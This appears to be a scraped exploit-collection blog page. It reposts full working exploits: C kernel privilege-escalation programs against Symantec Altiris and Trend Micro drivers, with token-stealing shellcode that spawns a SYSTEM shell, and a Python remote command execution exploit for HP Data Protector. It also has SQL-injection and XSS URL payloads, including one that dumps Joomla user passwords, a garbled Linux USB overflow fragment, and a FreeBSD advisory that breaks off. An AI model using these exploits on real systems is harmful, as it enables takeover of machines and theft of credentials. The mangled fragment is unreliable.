/*
Exploit Title - Symantec Altiris Agent Arbitrary Write Privilege Escalation
Date - 01st February 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://www.symantec.com
Tested Version - 6.9 (Build 648)
Driver Version - No version set - AlKernel.sys
Tested on OS - 32bit Windows XP SP3 and Windows Server 2003 SP2
OSVDB - http://www.osvdb.org/show/osvdb/116082
CVE ID - CVE-2014-7286
Vendor fix url - http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141219_00
Fixed version - To remove driver
Fixed driver ver - n/a
Note
----
Overwritten HAL dispatch table after exploit
kd> dps nt!HalDispatchTable l c
8054ccb8 00000003
8054ccbc 746f6353
8054ccc0 6f725774
8054ccc4 68546574
8054ccc8 00217369
8054cccc 8050ac4d nt!HalExamineMBR
8054ccd0 805c6f89 nt!IoAssignDriveLetters
8054ccd4 805c4ae5 nt!IoReadPartitionTable
8054ccd8 80613f7b nt!IoSetPartitionInformation
8054ccdc 806141ef nt!IoWritePartitionTable
8054cce0 8052d157 nt!CcHasInactiveViews
8054cce4 804e42d1 nt!ObpTraceDepth+0x19
4 pointers are overwritten with the hardcoded string "ScottWroteThis!" set in the driver.
The driver looks like has one main task is to retrieve configuration information about
the hardware using the HalGetBusData function. If it cannot retrieve configuration
information it sends the "ScottWroteThis!" string to the output buffer.
Also to point out the driver is not signed, no file version set, no product version set,
no product name set.
Question about the string ""ScottWroteThis!" was posted online in 2006
http://mygreenpaste.blogspot.co.uk/2006/06/beam-me-up-scotty.html
*/
#include <stdio.h>
#include <windows.h>
#define INBUFSIZE 16
#define BUFSIZE 4096
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
DWORD ProfileSource,
PULONG Interval);
typedef void (*FUNCTPTR)();
// Windows XP SP3
#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
// Windows Server 2003
#define W2K3_KPROCESS 0x38 // Offset to _KPROCESS from a _ETHREAD struct
#define W2K3_TOKEN 0xd8 // Offset to TOKEN from the _EPROCESS struct
#define W2K3_UPID 0x94 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W2K3_APLINKS 0x98 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_xp[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc2,0x08 // ret 8 Away from the kernel
};
BYTE token_steal_w2k3[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,W2K3_KPROCESS, // mov eax, [eax+W2K3_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,W2K3_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W2K3_TOKEN] Retrieves TOKEN
0x8b,0x80,W2K3_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W2K3_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,W2K3_APLINKS,0x00,0x00,0x00, // sub eax, W2K3_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,W2K3_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,// cmp [eax+W2K3_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,W2K3_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W2K3_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,W2K3_TOKEN,0x00,0x00,0x00, // mov [eax+W2K3_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc2,0x08 // ret 8 Away from the kernel
};
DWORD HalDispatchTableAddress()
{
_NtQuerySystemInformation NtQuerySystemInformation;
PSYSTEM_MODULE_INFORMATION pModuleInfo;
DWORD HalDispatchTable;
CHAR kFullName[256];
PVOID kBase = NULL;
LPSTR kName;
HMODULE Kernel;
FUNCTPTR Hal;
ULONG len;
NTSTATUS status;
NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
if (!status)
{
printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
return -1;
}
pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
if(pModuleInfo == NULL)
{
printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
memset(kFullName, 0x00, sizeof(kFullName));
strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
kBase = pModuleInfo->Module[0].Base;
printf("[i] Kernel base name %s\n", kFullName);
kName = strrchr(kFullName, '\\');
Kernel = LoadLibraryA(++kName);
if(Kernel == NULL)
{
printf("[-] Failed to load kernel base\n\n");
return -1;
}
Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
if(Hal == NULL)
{
printf("[-] Failed to find HalDispatchTable\n\n");
return -1;
}
printf("[i] HalDispatchTable address 0x%08x\n", Hal);
printf("[i] Kernel handle 0x%08x\n", Kernel);
printf("[i] Kernel base address 0x%08x\n", kBase);
HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);
printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);
if(!HalDispatchTable)
{
printf("[-] Failed to calculate HalDispatchTable\n\n");
return -1;
}
return HalDispatchTable;
}
int GetWindowsVersion()
{
int v = 0;
DWORD version = 0, minVersion = 0, majVersion = 0;
version = GetVersion();
minVersion = (DWORD)(HIBYTE(LOWORD(version)));
majVersion = (DWORD)(LOBYTE(LOWORD(version)));
if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP;
if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7";
if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003;
return v;
}
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtQueryIntervalProfile NtQueryIntervalProfile;
BYTE *inbuffer;
BYTE *shell;
LPVOID addrtoshell = (LPVOID)0x746f6353;
HANDLE hDevice;
DWORD dwRetBytes = 0;
DWORD HalDispatchTableTarget;
ULONG time = 0;
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf(" Symantec Altiris Agent Arbitrary (alkernel.sys) Arbitrary Write EoP Exploit \n");
printf(" Tested on Windows XP SP3/Windows Server 2003 SP2 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows XP\n");
}
if (GetWindowsVersion() == 3)
{
printf("[i] Running Windows Server 2003\n");
}
if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not supported on this OS\n\n");
return -1;
}
sprintf(devhandle, "\\\\.\\%s", "alkernel");
NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile)
{
printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
return -1;
}
inbuffer = VirtualAlloc(NULL, INBUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
memset(inbuffer, 0x41, INBUFSIZE);
shell = VirtualAlloc(addrtoshell, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(shell == NULL)
{
printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
return -1;
}
printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", shell);
memset(addrtoshell, 0x90, BUFSIZE);
if (GetWindowsVersion() == 1)
{
memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
}
if (GetWindowsVersion() == 3)
{
memcpy(addrtoshell, token_steal_w2k3, sizeof(token_steal_w2k3));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w2k3));
}
printf("[+] Shellcode located at address 0x%.8x\n", addrtoshell);
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);
printf("[~] Press any key to send Exploit . . .\n");
getch();
DeviceIoControl(hDevice, 0x00222000, inbuffer, INBUFSIZE, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
printf("[+] Buffer sent\n");
CloseHandle(hDevice);
printf("[+] Spawning SYSTEM Shell\n");
NtQueryIntervalProfile(2, &time);
spawnShell();
return 0;
}
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863222355
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
/*
Exploit Title - Trend Micro Multiple Products Arbitrary Write Privilege Escalation
Date - 31st January 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://www.trendmicro.co.uk/
Tested Version - 8.0.1133
Driver Version - 2.0.0.1009 - tmeext.sys
Tested on OS - 32bit Windows XP SP3
OSVDB - http://www.osvdb.org/show/osvdb/115514
CVE ID - CVE-2014-9641
Vendor fix url - http://esupport.trendmicro.com/solution/en-US/1106233.aspx
Fixed version - 8.0.1133
Fixed driver ver - 2.0.0.1015
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 4096
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
DWORD ProfileSource,
PULONG Interval);
typedef void (*FUNCTPTR)();
// Windows XP SP3
#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_xp[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc2,0x08 // ret 8 Away from the kernel
};
DWORD HalDispatchTableAddress()
{
_NtQuerySystemInformation NtQuerySystemInformation;
PSYSTEM_MODULE_INFORMATION pModuleInfo;
DWORD HalDispatchTable;
CHAR kFullName[256];
PVOID kBase = NULL;
LPSTR kName;
HMODULE Kernel;
FUNCTPTR Hal;
ULONG len;
NTSTATUS status;
NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
if (!status)
{
printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
return -1;
}
pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
if(pModuleInfo == NULL)
{
printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
memset(kFullName, 0x00, sizeof(kFullName));
strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
kBase = pModuleInfo->Module[0].Base;
printf("[i] Kernel base name %s\n", kFullName);
kName = strrchr(kFullName, '\\');
Kernel = LoadLibraryA(++kName);
if(Kernel == NULL)
{
printf("[-] Failed to load kernel base\n\n");
return -1;
}
Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
if(Hal == NULL)
{
printf("[-] Failed to find HalDispatchTable\n\n");
return -1;
}
printf("[i] HalDispatchTable address 0x%08x\n", Hal);
printf("[i] Kernel handle 0x%08x\n", Kernel);
printf("[i] Kernel base address 0x%08x\n", kBase);
HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);
printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);
if(!HalDispatchTable)
{
printf("[-] Failed to calculate HalDispatchTable\n\n");
return -1;
}
return HalDispatchTable;
}
int GetWindowsVersion()
{
int v = 0;
DWORD version = 0, minVersion = 0, majVersion = 0;
version = GetVersion();
minVersion = (DWORD)(HIBYTE(LOWORD(version)));
majVersion = (DWORD)(LOBYTE(LOWORD(version)));
if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP;
if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7";
if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003;
return v;
}
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtQueryIntervalProfile NtQueryIntervalProfile;
LPVOID input[1] = {0};
LPVOID addrtoshell;
HANDLE hDevice;
DWORD dwRetBytes = 0;
DWORD HalDispatchTableTarget;
ULONG time = 0;
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf(" Trend Micro Multiple Products (tmeext.sys) Arbitrary Write EoP Exploit \n");
printf(" Tested on Windows XP SP3 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows XP\n");
}
if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not supported on this OS\n\n");
return -1;
}
sprintf(devhandle, "\\\\.\\%s", "tmnethk");
NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile)
{
printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
return -1;
}
addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(addrtoshell == NULL)
{
printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
return -1;
}
printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);
memset(addrtoshell, 0x90, BUFSIZE);
memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);
input[0] = addrtoshell; // input buffer contents gets written to our output buffer address
printf("[+] Input buffer contents %08x\n", input[0]);
printf("[~] Press any key to send Exploit . . .\n");
getch();
DeviceIoControl(hDevice, 0x00222400, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
printf("[+] Buffer sent\n");
CloseHandle(hDevice);
printf("[+] Spawning SYSTEM Shell\n");
NtQueryIntervalProfile(2, &time);
spawnShell();
return 0;
}
#!/usr/bin/python
# Exploit Title: HP-Data-Protector-8.x Remote command execution.
# Google Dork: -
# Date: 30/01/2015
# Exploit Author: Juttikhun Khamchaiyaphum
# Vendor Homepage: https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818
# Software Link: http://www8.hp.com/th/en/software-solutions/data-protector-backup-recovery-software/
# Version: 8.x
# Tested on: IA64 HP Server Rx3600
# CVE : CVE-2014-2623
# Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. "uname -m">"
import socket
import struct
import sys
def exploit(host, port, command):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host, port))
print "[+] Target connected."
OFFSET_DEC_START = 133
OFFSET_DEC = (OFFSET_DEC_START + len(command))
# print "OFFSET_DEC_START:" + str(OFFSET_DEC_START)
# print "len(command)" + str(len(command))
# print "OFFSET_DEC" + str(OFFSET_DEC)
OFFSET_HEX = "%x" % OFFSET_DEC
# print "OFFSET_HEX" + str(OFFSET_HEX)
OFFSET_USE = chr(OFFSET_DEC)
# print "Command Length: " + str(len(command))
PACKET_DATA = "\x00\x00\x00"+\
OFFSET_USE+\
"\x20\x32\x00\x20\x73\x73\x73\x73\x73\x73\x00\x20\x30" + \
"\x00\x20\x54\x45\x53\x54\x45\x52\x00\x20\x74\x65\x73\x74\x65\x72\x00" + \
"\x20\x43\x00\x20\x32\x30\x00\x20\x74\x65\x73\x65\x72\x74\x65\x73\x74" + \
"\x2E\x65\x78\x65\x00\x20\x72\x65\x73\x65\x61\x72\x63\x68\x00\x20\x2F" + \
"\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75" + \
"\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x30\x00" + \
"\x20\x32\x00\x20\x75\x74\x69\x6C\x6E\x73\x2F\x64\x65\x74\x61\x63\x68" + \
"\x00\x20\x2D\x64\x69\x72\x20\x2F\x62\x69\x6E\x20\x2D\x63\x6F\x6D\x20" + \
" %s\x00" %command
# Send payload to target
print "[+] Sending PACKET_DATA"
sock.sendall(PACKET_DATA)
# Parse the response back
print "[*] Result:"
while True:
response = sock.recv(2048)
if not response: break
print response
except Exception as ex:
print >> sys.stderr, "[-] Socket error: \n\t%s" % ex
exit(-3)
sock.close()
if __name__ == "__main__":
try:
target = sys.argv[1]
port = int(sys.argv[2])
command = sys.argv[3]
exploit(target, port, command)
except IndexError:
print("Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. \"uname -m\">")
exit(0)
source: https://www.securityfocus.com/bid/48690/info
The Controller component for Joomla! is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_controller&id=53&Itemid=[SQLi]
source: https://www.securityfocus.com/bid/48689/info
The 'com_hospital' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_hospital&view=departments&Itemid=21&did=[SQL INJECTION]
source: https://www.securityfocus.com/bid/48688/info
The Juicy Gallery component for Joomla! is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_juicy&task=showComments&picId=[EXPLOIT]
source: https://www.securityfocus.com/bid/48687/info
The Auerswald USB Device Driver for the Linux kernel is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to execute arbitrary code with superuser privileges, facilitating the complete compromise of affected computers. Failed exploit attempts will likely crash the kernel, denying service to legitimate users.
Linux kernel 2.6.26 is vulnerable; prior versions may also be affected.
0xbf, 0x09, /* u16 idVendor; */
0xc0, 0x00, /* u16 idProduct; */
0x10, 0x42, /* u16 bcdDevice */
case 1:
/* serial number */
ret = set_usb_string(data, ��);
break;
case 2:
ret = set_usb_string(data,�AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�);
source: https://www.securityfocus.com/bid/48685/info
The 'Foto' component for Joomla! is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_foto&task=categoria&id_categoria=-4+union+select+1,password,username,4,5,6,7+from+jos_users--
source: https://www.securityfocus.com/bid/48684/info
Easy Estate Rental is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/demo/uk/site_location.php?s_location=46â??a
source: https://www.securityfocus.com/bid/48672/info
Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability.
An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information.
Chyrp 2.1 is vulnerable; other versions may also be affected.
http://www.example.comincludes/javascript.php?action=[XSS]
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
FreeBSD Kernel Multiple Vulnerabilities
1. *Advisory Information*
Title: FreeBSD Kernel Multiple Vulnerabilities
Advisory ID: CORE-2015-0003
Advisory URL: http://www.coresecurity.com/content/freebsd-kernel-multiple-vulnerabilities
Date published: 2015-01-27
Date of last update: 2015-01-27
Vendors contacted: FreeBSD
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Unsigned to Signed Conversion Error [CWE-196], Improper Validation of Array Index [CWE-129], Improper Validation of Array Index [CWE-129]
Impact: Code execution, Denial of service
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2014-0998, CVE-2014-8612, CVE-2014-8612
3. *Vulnerability Description*
FreeBSD is an advanced computer operating system used to power modern servers, desktops and embedded platforms.
A large community has continually developed it for more than thirty years. Its advanced networking,
security and storage features have made FreeBSD the platform of choice for many of the busiest web sites
and most pervasive embedded networking and storage devices.
Multiple vulnerabilities have been found in the FreeBSD kernel code that implements
the vt console driver (previously known as Newcons) and the code that implements SCTP sockets.
These vulnerabilities could allow local unprivileged attackers to disclose kernel memory containing
sensitive information, crash the system, and execute arbitrary code with superuser privileges.
4. *Vulnerable packages*
. FreeBSD 10.1-RELEASE.
Other versions may be affected too but they were no checked.
5. *Non-vulnerable packages*
. FreeBSD 10.1-RELENG.
6. *Vendor Information, Solutions and Workarounds*
The FreeBSD team has released patches for the reported vulnerabilities. You should upgrade to FreeBSD 10.1-RELENG or one of the following releases:
. stable/10, 10.1-STABLE
. releng/10.1, 10.1-RELEASE-p5
. releng/10.0, 10.0-RELEASE-p17
. stable/9, 9.3-STABLE
. releng/9.3, 9.3-RELEASE-p9
. stable/8, 8.4-STABLE
. releng/8.4, 8.4-RELEASE-p23
The vendor publish a security Advisory that can be accessed here[6].
7. *Credits*
This vulnerability was discovered and researched by Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.
8. *Technical Description / Proof of Concept Code*
8.1. *FreeBSD vt Driver VT_WAITACTIVE Sign Conversion Vulnerability*
[CVE-2014-0998]
FreeBSD 10.1-RELEASE added[1] the 'vt(4)'[2] console driver (previously known as Newcons[3]). This new console driver can be enabled by adding the line 'kern.vty=vt' to the '/boot/loader.conf' file and then rebooting the system.
